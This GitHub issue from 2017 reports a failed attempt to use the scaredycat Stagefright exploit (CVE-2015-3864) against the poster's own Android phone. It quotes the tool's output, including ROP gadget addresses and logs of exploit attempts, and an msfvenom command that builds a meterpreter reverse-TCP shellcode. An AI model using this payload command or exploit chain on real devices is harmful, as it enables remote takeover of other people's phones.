Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Reverse shell not working on my device #8

Closed
dadreamer opened this issue Jun 16, 2017 · 1 comment
Closed

Reverse shell not working on my device #8

dadreamer opened this issue Jun 16, 2017 · 1 comment

Comments

@dadreamer
Copy link

dadreamer commented Jun 16, 2017
edited
Loading

I'm trying to get a reverse shell on my smartphone Docomo Fujitsu Arrows NX F-01F [ Android 4.4.2, build # V10R22A (kernel version 3.4.0), ARMv7 arch (armv7l, armeabi-v7a) ]. Stagefright Detector shows that this device is vulnerable to CVE-2015-3864. So I set up the environment to run scaredycat.py on Ubuntu 15.04. Also I've pulled out libc.so from the phone and generated new shellcode.bin with my IP/port params.

This is how it starts:

ubuntu@ubuntu-VirtualBox:~/scaredycat-master$ python scaredycat.py 

**************************************************
       *** SCAREDYCAT! version 0.1 beta ***       
         author:  vvn <root@nobody.ninja>
         release date: December 8, 2015

please support my work by buying a copy of my EP!

http://dreamcorp.us
http://facebook.com/dreamcorporation
**************************************************


** ON LOCAL NETWORK, URL IS: http://192.168.0.4:8080 ** 


[*] memcpy : 0xb6edf221
[*] mmap64 : 0xb6ecfeb5
b6edf09c:       e280204c        add     r2, r0, #76     ; 0x4c
b6edf0a0:       e8927ff0        ldm     r2, {r4, r5, r6, r7, r8, r9, sl, fp, ip, sp, lr}
b6edf0a4:       e33d0000        teq     sp, #0
b6edf0a8:       133e0000        teqne   lr, #0
[*] stack_pivot : 0xb6edf09c
b6ecc29e:       bd00            pop     {pc}
[*] pop_pc : 0xb6ecc29f
b6ed144c:       bd0f            pop     {r0, r1, r2, r3, pc}
[*] pop_r0_r1_r2_r3_pc : 0xb6ed144d
b6ecf6d6:       bdf0            pop     {r4, r5, r6, r7, pc}
[*] pop_r4_r5_r6_r7_pc : 0xb6ecf6d7
b6ef9bb8:       e59de040        ldr     lr, [sp, #64]   ; 0x40
b6ef9bbc:       e28dd048        add     sp, sp, #72     ; 0x48
b6ef9bc0:       e12fff1e        bx      lr
[16/Jun/2017:09:12:18] ENGINE Listening for SIGHUP.
[16/Jun/2017:09:12:18] ENGINE Listening for SIGTERM.
[16/Jun/2017:09:12:18] ENGINE Listening for SIGUSR1.
[16/Jun/2017:09:12:18] ENGINE Bus STARTING
CherryPy Checker:
The Application mounted at '' has an empty config.

[16/Jun/2017:09:12:18] ENGINE Started monitor thread 'Autoreloader'.
[16/Jun/2017:09:12:18] ENGINE Started monitor thread '_TimeoutMonitor'.
[16/Jun/2017:09:12:18] ENGINE Serving on http://0.0.0.0:8080
[16/Jun/2017:09:12:18] ENGINE Bus STARTED

On the phone I can load that html with mp4 when I go to http://192.168.0.4:8080. When the browser loads the page I see the client's queries to the server:

********************************************************************************
exploit attempt: 1
********************************************************************************
192.168.0.3 - - [16/Jun/2017:09:16:18] "GET / HTTP/1.1" 200 517 "" "Mozilla/5.0 (Linux; U; Android 4.4.2; ru-; F-01F Build/V10R22A) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
********************************************************************************
exploit attempt: 2
********************************************************************************
192.168.0.3 - - [16/Jun/2017:09:16:22] "GET / HTTP/1.1" 200 517 "http://192.168.0.4:8080/" "Mozilla/5.0 (Linux; U; Android 4.4.2; ru-; F-01F Build/V10R22A) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
********************************************************************************
exploit attempt: 3
********************************************************************************
192.168.0.3 - - [16/Jun/2017:09:16:26] "GET / HTTP/1.1" 200 517 "http://192.168.0.4:8080/" "Mozilla/5.0 (Linux; U; Android 4.4.2; ru-; F-01F Build/V10R22A) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"

And so forth (the server reloads the page and nothing happens moreover). Well, I tried different browsers (default one and Firefox), different IPs, ports etc. That all doesn't help. How could I check if this CVE works on my device or the shellcode is wrong or ... ?
I create shellcode with this command:
msfvenom -p linux/armle/meterpreter/reverse_tcp lhost=192.168.0.4 lport=8080 R > ~/scaredycat-master/shellcode.bin
I assume it should be linux payload, not android one. Right?

Now I don't know what to do with this exploit so I'm gonna test other tools, e.g. Metaphor. Those might be more successful than this one, but they are more complicated.
@dadreamer dadreamer mentioned this issue Jun 16, 2017
Open
@dadreamer
Copy link
Author

Closing this as not actual for me.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@dadreamer